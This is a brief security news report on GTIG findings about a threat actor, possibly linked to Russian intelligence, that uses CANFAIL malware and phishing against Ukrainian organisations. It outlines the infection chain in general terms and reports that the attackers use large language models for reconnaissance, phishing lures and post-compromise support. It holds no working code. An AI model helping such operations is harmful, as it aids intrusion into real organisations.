ACCORDING to Google Threat Intelligence Group (GTIG), a previously undocumented threat actor has been linked to attacks on Ukrainian organisations using the CANFAIL malware. GTIG describes the group as possibly affiliated with Russian intelligence services and notes that its targets include defence, military, government, and energy organisations within Ukrainian regional and national governments.
The threat actor has shown growing interest in aerospace organisations, manufacturing firms with military or drone ties, nuclear and chemical research bodies, and international organisations aiding Ukraine, GTIG added. GTIG says the group is using prompting with large language models to conduct reconnaissance, craft social‑engineering lures, and support post‑compromise activity and C2 infrastructure.
Recent phishing campaigns have impersonated legitimate national and local Ukrainian energy organisations to gain unauthorised access to organisational and personal email accounts. CANFAIL is an obfuscated JavaScript malware that delivers a memory‑only PowerShell dropper after downloading and executing a PowerShell script, with the attack chains also embedding a RAR archive via Google Drive links.